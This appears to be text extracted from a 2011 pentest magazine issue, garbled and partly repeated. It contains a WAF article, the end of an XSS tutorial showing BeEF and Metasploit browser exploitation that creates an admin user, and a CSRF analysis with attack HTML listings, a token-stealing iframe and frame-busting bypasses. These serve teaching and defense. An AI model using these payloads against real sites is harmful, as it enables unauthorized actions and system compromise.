The only more recent trend The attackers have recently started to combine the methods more often in order to obtain even higher success rates And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better Instead an increasing number of smaller companies are now in the crossfire
One ExampleAttackers know that a certain commercial software program is widely used for shopping carts in online shops and that the smaller companies rarely patch the weak points They launch automated attacks in order to identify ndash with high efficiency ndash as many worthwhile targets as possible in the web In this step they already gather the required data about the underlying software the operating system or the database from web applications which give away information freely The attackers then only have to evaluate this information As such they have an extensive basis for later targeted attacks
How to Make a Web Application SecureThere are two ways of actually securing the data and processes that are connected to web applications The first way would be to program each application absolutely error-free under the required application conditions and security aspects according to predefined guidelines Companies would have to increase the security of older web applications to the required standards later
However this intention is generally doomed to failure from the outset because the later integration of security functions in an existing application is in most cases not only difficult but also above all expensive Another example a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked It is then not sufficient to just add new functions The developers must start by precisely analyzing the program and then making deep inroads into its basic structures This is not only tedious but also harbors the danger of making mistakes Another example is programs that do not just use the session attributes for authentification In this case it is not straightforward to update the session ID after logging in This makes the application susceptible for Session Fixation
If existing web applications display weak spots ndash and the probability is relatively high ndash then it should be clarified whether it makes business sense to correct them It should not be forgotten here that other systems are put at risk by the unsecured application A risk analysis can bring clarity whether and to what extent the problems must be resolved or if further measures should be taken at the same time Often however the program developers are no longer available and training new developers as well as analyzing the web application results in additional costs
The situation is not much better with web applications that are to be developed from scratch There is no software program that ever went into productive operation free of errors or without weak spots The shortcomings are frequently uncovered over time And by this time correcting the errors is once again time-consuming and expensive In addition the application cannot be deactivated during this period if it works as a sales driver or as an important business process Despite this the demand for good code programming that sensibly combines effectiveness functionality and security still has top priority The safer a web application is written the lower the improvement work and the less complex the external security measures that have to be adopted
The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP) As such it represents a special case of Application-Level-Firewalls (ALF) or Application-Level-Gateways (ALG) In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
Now first ensure that the Zombie is still connected Then click on Standard modules ndash Browser Exploit and configure the exploit as per the screenshot below Wersquore basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8)
Open a shell and run msfconsole to start metasploit Once you see the msfgt prompt click the zombie in the browser and click the Send Now button to send the exploit payload to the victim You can immediately check if Beef can talk to Metasploit by running the jobs command (Figure 9)
If the victimrsquos browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit) it will connect back to the running Metasploit instance Herersquos what you see in Metasploit a while after you click Send Now (Figure 10)
Once yoursquove got a prompt yoursquore on that remote system and can do anything that you want with the privileges of that user Here are a few more screenshots of what you can do with Meterpreter The screenshots are self explanatory so I wonrsquot say much (Figure 11-13)
The user was apparently logged in with admin privileges and we could create a user by the name dennis on the remote machine At this point of time we have complete control over 1 machine
Once we have control over this machine we can use FTP or HTTP and download various other tools like Nmap Nessus a sniffer to capture all keystrokes on this machine or even another copy of Metasploit and install these on this machine We can then use these to port scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network Eventually over a period of time it is potentially possible to compromise every machine on that network
MitigationTo mitigate XSS one must do the following
Figure 13 Meterpreter window - screenshot 3
bull Make a list of parameters whose values depend on user input and whose resultant values after they are processed by application code are reflected in the userrsquos browser
bull All such output as in a) must be encoded before displaying it to the user The OWASP XSS prevention cheatsheet is a good guide for the same
bull White List and Black list filtering can also be used to completely disallow specific characters in user input fields
ConclusionIn a nutshell we can conclude that if even a single parameter is vulnerable to XSS it can result in the complete compromise of that userrsquos machine If the XSS is persistent then the number of users that could potentially be in trouble increases So while XSS does involve some kind of user input like clicking a link or visiting a page it is still a high risk vulnerability and must be mitigated throughout every application
ARVIND DORAISWAMYArvind Doraiswamy is an Information Security Professional with 6 years of experience in SystemNetwork and Web Application Penetration testing In addition he freelances in information security audits trainings and product development [Perl Ruby on Rails] while spending a lot of time learning more about malware analysis and reverse engineering Email ndash arvinddoraiswamygmailcomLinked In ndash httpwwwlinkedincompubarvind-doraiswamy39b21332Other writings ndash httpresourcesinfosecinstitutecomauthorarvind AND httpardsecblogspotcom
Referencesbull httpwwwtechnicalinfonetpapersCSShtmlbull httpswwwowasporgindexphpCross-site_Scripting_
28XSS29bull httpswwwowasporgindexphpXSS_28Cross_Site_
Scripting29_Prevention_Cheat_Sheetbull httpbeefprojectcom
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
In simple words when an evil website posts a new status to your Twitter account while your Twitter login session is still active
Csrf BasicsA simple example of this is the following hidden HTML code inside the evilcom webpage
ltimg src=rdquohttptwittercomhomestatus=evilcomrdquo
style=rdquodisplaynonerdquogt
Many web developers use POST instead of GET requests to avoid this kind of a malicious attack But this
approach is useless as shown by the following HTML code used to bypass that kind of a protection (Listing 1)
Usless DefensesThe following are the weak defenses
Only accept POST This stops simple link-based attacks (IMG frames etc) but hidden POST requests can be created within frames scripts etc
Referrer checking Some users prohibit referrers so you cannot just require referrer headers Techniques to selectively create HTTP request without referrers exist
Requiring multiStep transactions CSRF attacks can perform each step in order
DefenseThe approach used by many web developers is the CAPTCHA systems and one- time tokens CAPTCHA systems are widely used by asking a user to fill the text in the CAPTCHA image every time the user submits a form might make them stop visiting your website This is why web sites use one-time tokens Unlike the CAPTCHA system one-time tokens are unique values stored in a
Cross-site Request ForgeryIN-DEPTH ANALYSIS bull CYBER GATES bull 2011
Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of the authorized users
Listing 1 HTML code used to bypass protection
ltdiv style=displaynonegt
ltiframe name=hiddenFramegtltiframegt
ltform name=Form action=httpsitecompostphp
target=hiddenFrame
method=POSTgt
ltinput type=text name=message value=I like
wwwevilcom gt
ltinput type=submit gt
ltformgt
ltscriptgtdocumentFormsubmit()ltscriptgt
ltdivgt
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
indexphp(Victim website)
And the webpage which processes the request and stores the message only if the given token is correct
postphp(Victim website)
In-depth AnalysisIn-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token The following is a real scenarioListing 4
indexphp(Evil website)
For security reasons the same origin policy in browsers restricts access of browser-side program-ming languages such as JavaScript to access a remote content and the browser throws the following exception
Permission denied to access property lsquodocumentrsquo
var token = windowframes[0]documentforms[lsquomessageFormrsquo]
tokenvalue
Browserrsquos settings are not hard to modify So the best way for web application security is to secure web application itself
Frame BustingThe best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens FrameKillers are small piece of Javascript code used to protect web pages from being framed
ltscript type=rdquotextjavascriptrdquogt
if(top = self) toplocationreplace(location)
ltscriptgt
It consists of Conditional statement and Counter-action
statement
Common conditional statements are the following
if (top = self)
if (toplocation = selflocation)
if (toplocation = location)
if (parentframeslength gt 0)
if (window = top)
if (windowtop == windowself)
if (windowself = windowtop)
if (parent ampamp parent = window)
if (parent ampamp parentframes ampamp parentframeslengthgt0)
if((selfparentampamp(selfparent===self))ampamp(selfparentfr
ameslength=0))
webpage formrsquos hidden field and in a session at the same time to compare them after the page form submission
Mechanisms used to subvert one-time tokens is usually accomplished by brute force attacks Brute forcing attacks against one-time tokens is useful only if the mechanism is widely used by web developers For example the following PHP code
ltphp
$token = md5(uniqid(rand() TRUE))
$_SESSION[lsquotokenrsquo] = $token
gt
Defense Using One-time TokensTo understand better how this system works letrsquos take a look to a simple webpage which has a form with one-time token Listing 2
Listing 2 Wrong token
ltphp session_start()gt
lthtmlgt
ltheadgt
lttitlegtGOODCOMlttitlegt
ltheadgt
ltbodygt
ltphp
$token = md5(uniqid(rand()true))
$_SESSION[token] = $token
gt
ltform name=messageForm action=postphp method=POSTgt
ltinput type=text name=messagegt
ltinput type=submit value=Postgt
ltinput type=hidden name=token value=ltphp echo $tokengtgt
ltformgt
ltbodygt
lthtmlgt
Listing 3 Correct token
ltphp
session_start()
if($_SESSION[token] == $_POST[token])
$message = $_POST[message]
echo ltbgtMessageltbgtltbrgt$message
$file = fopen(messagestxta)
fwrite($file$messagern)
fclose($file)
else
echo Bad request
gt
WEB APP VULNERABILITIES
Page 36 httppentestmagcom012011 (1) November
And common counter-action statements are these
toplocation = selflocation
toplocationhref = documentlocationhref
toplocationreplace(selflocation)
toplocationhref = windowlocationhref
toplocationreplace(documentlocation)
toplocationhref = windowlocationhref
toplocationhref = bdquoURLrdquo
documentwrite(lsquorsquo)
toplocationreplace(documentlocation)
toplocationreplace(lsquoURLrsquo)
toplocationreplace(windowlocationhref)
toplocationhref = locationhref
selfparentlocation = documentlocation
parentlocationhref = selfdocumentlocation
Different FrameKillers are used by web developers and different techniques are used to bypass them
Method 1
ltscriptgt
windowonbeforeunload=function()
return bdquoDo you want to leave this pagerdquo
ltscriptgt
ltiframe src=rdquohttpwwwgoodcomrdquogtltiframegt
Method 2Using Double framing
ltiframe src=rdquosecondhtmlrdquogtltiframegt
secondhtml
ltiframe src=rdquohttpwwwsitecomrdquogtltiframegt
Best PracticesAnd the best example of FrameKiller is the following
ltstylegt html display none ltstylegt
ltscriptgt
if( self == top ) documentdocumentElementstyledispla
y=rsquoblockrsquo
else toplocation = selflocation
ltscriptgt
Which protects web application even if an attacker browses the webpage with javascript disabled option in the browser
SAMVEL GEVORGYANFounder amp Managing Director CYBER GATESwwwcybergatesam | samvelgevorgyancybergatesamSamvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting Testing and Research Company and has over 5 years of experience working in the IT industry He started his career as a web designer in 2006 Then he seriously began learning web programming and web security concepts which allowed him to gain more knowledge in web design web programming techniques and information security All this experience contributed to Samvelrsquos work ethics for he started to pay attention to each line of the code for good optimization and protection from different kinds of malicious attacks such as XSS(Cross-Site Scripting) SQL Injection CSRF(Cross-Site Request Forgery) etc Thus Samvel has transformed his job to a higher level and he is gradually becoming more complete security professional
Referencesbull Cross-Site Request Forgery ndash httpwwwowasporg
indexphpCross-Site_Request_Forgery_28CSRF29 httpprojectswebappsecorgwpage13246919Cross-Site-Request-Forgery
bull Same Origin Policybull FrameKiller(Frame Busting) ndash httpenwikipediaorgwiki
Framekiller httpseclabstanfordeduwebsecframebustingframebustpdf
Listing 4 Real scenario of the attack
lthtmlgt
ltheadgt
lttitlegtBADCOMlttitlegt
function submitForm()
var token = windowframes[0]documentforms[message
Form]elements[token]value
var myForm = documentmyForm
myFormtokenvalue = token
myFormsubmit()
ltscriptgt
ltheadgt
ltbody onLoad=submitForm()gt
ltdiv style=displaynonegt
ltiframe src=httpgoodcomindexphpgtltiframegt
ltform name=myForm target=hidden action=http
goodcompostphp method=POSTgt
ltinput type=text name=message value=I like wwwbadcom gt
ltinput type=hidden name=token value= gt
ltinput type=submit value=Postgt
ltformgt
ltdivgt
ltbodygt
lthtmlgt
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
They are currently being used by hackers on a grand scale as gateways into corporate networks Web Application Firewalls (WAFs)
make it a lot more difficult to penetrate networksIn most commercial and non-commercial areas the
internet has developed into an indispensible medium that offers users a huge number of interesting and important applications Information procurement of any kind buying services or products but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen Waiting times are a thing of the past and while we used to have to search laboriously for information we now have the search engines that deliver the results in a matter of seconds And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives In order to facilitate all of these processes a broad range of applications is required that are provided more or less publically Their range extends from simple applications for searching for product information or forms up to complex systems for auctions product orders internet banking or processing quotations They even control access to the companyrsquos own intranet
A major reason for these rapid developments is the almost unlimited possibilities to simplify accelerate and make business processes more productive Most enterprises and public authorities also see the web as
an opportunity to make enormous cost savings benefit from additional competitive advantages and open up new business opportunities This requires a growing number of ndash and more powerful ndash applications that provide the internet user with the required functions as fast and simply as possible
Developers of such software programs are under enormous cost and time pressure An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products services and information as quickly as possible simply and in a variety of ways So guidelines for safe programming and release processes are usually not available or they are not heeded In the end this results in programming errors because major security aspects are deliberately disregarded or are simply forgotten The productive use usually follows soon after development without developers having checked the security status of the web applications sufficiently
Above all the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent those responsible unwittingly grant access to systems within the corporate boundaries And thereby
First the Security Gate then the AirplaneWhat needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master The subject of security is however often an afterthought But with web applications the backlash comes quickly because many are accessible for everyone worldwide
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
The problem with more recent web applications Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic These include for example Ajax and JavaScript While the browser was originally only a passive tool for viewing web sites it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons But that makes the browser and its tools vulnerable The attackers gain access to the browser via infected web applications and as such to further systems and to their ownersrsquo or usersrsquo sensitive data
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data This is completely wrong The opposite is the case One single unsecured web application endangers the security of further systems that follow on such as application or database servers Equally wrong is the common misconception that the telecom providersrsquo security services would protect the data Providers are not responsible for a safe use of web applications regardless of where they are hosted Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications one which they often do not fulfill
they disclose sensitive data and make processes vulnerable But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications
As a result critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here Particularly in association with the web the security requirements for applications have a different focus and are much higher than for traditional network security The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher
While most companies in the meantime protect their networks to a relatively high standard the hackers have long since moved on to a different playing field They now take advantage of security loopholes in web applications There are several reasons for this Compared with the network level you donrsquot need to be highly skilled to use the internet This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications In addition the internet also offers many possibilities for concealment and making action anonymous As a result the risk for attackers remains relatively low and so does the inhibition threshold for hackers
Many web applications that are still active today were developed at a time when awareness for application security in the internet had not yet been raised There were hardly any threat scenarios because the attackersrsquo focus was directed at the internal IT structure of the companies In the first years of web usage in particular
Figure 1 This model (based on Everett M Rogers adoption curve from ldquoDiffusion of innovationsrdquo) shows a time lag between the adoption of new technology and the securing of the new technology Both exhibit the similar Technology Adoption Lifecycle There is an inection point when a technology becomes widely enough accepted and therefore economically relevant for hackers resulting in a period of Peak Vulnerability Bottom line Security is an afterthought
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under FireThe security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications For years now the major types have been
All injection attacks (such as SQL Injection Command Injection LDAP Injection Script Injection XPath Injection)
bull Cross Site Scripting (XSS)bull Hidden Field Tamperingbull Parameter Tamperingbull Cookie Poisoningbull Buffer Overflowbull Forceful Browsingbull Unauthorized access to web serversbull Search Engine Poisoning bull Social Engineering
The only more recent trend The attackers have recently started to combine the methods more often in order to obtain even higher success rates And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better Instead an increasing number of smaller companies are now in the crossfire
One ExampleAttackers know that a certain commercial software program is widely used for shopping carts in online shops and that the smaller companies rarely patch the weak points They launch automated attacks in order to identify ndash with high efficiency ndash as many worthwhile targets as possible in the web In this step they already gather the required data about the underlying software the operating system or the database from web applications which give away information freely The attackers then only have to evaluate this information As such they have an extensive basis for later targeted attacks
How to Make a Web Application SecureThere are two ways of actually securing the data and processes that are connected to web applications The first way would be to program each application absolutely error-free under the required application conditions and security aspects according to predefined guidelines Companies would have to increase the security of older web applications to the required standards later
However this intention is generally doomed to failure from the outset because the later integration of security functions in an existing application is in most cases not only difficult but also above all expensive Another example a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked It is then not sufficient to just add new functions The developers must start by precisely analyzing the program and then making deep inroads into its basic structures This is not only tedious but also harbors the danger of making mistakes Another example is programs that do not just use the session attributes for authentification In this case it is not straightforward to update the session ID after logging in This makes the application susceptible for Session Fixation
If existing web applications display weak spots ndash and the probability is relatively high ndash then it should be clarified whether it makes business sense to correct them It should not be forgotten here that other systems are put at risk by the unsecured application A risk analysis can bring clarity whether and to what extent the problems must be resolved or if further measures should be taken at the same time Often however the program developers are no longer available and training new developers as well as analyzing the web application results in additional costs
The situation is not much better with web applications that are to be developed from scratch There is no software program that ever went into productive operation free of errors or without weak spots The shortcomings are frequently uncovered over time And by this time correcting the errors is once again time-consuming and expensive In addition the application cannot be deactivated during this period if it works as a sales driver or as an important business process Despite this the demand for good code programming that sensibly combines effectiveness functionality and security still has top priority The safer a web application is written the lower the improvement work and the less complex the external security measures that have to be adopted
The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP) As such it represents a special case of Application-Level-Firewalls (ALF) or Application-Level-Gateways (ALG) In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
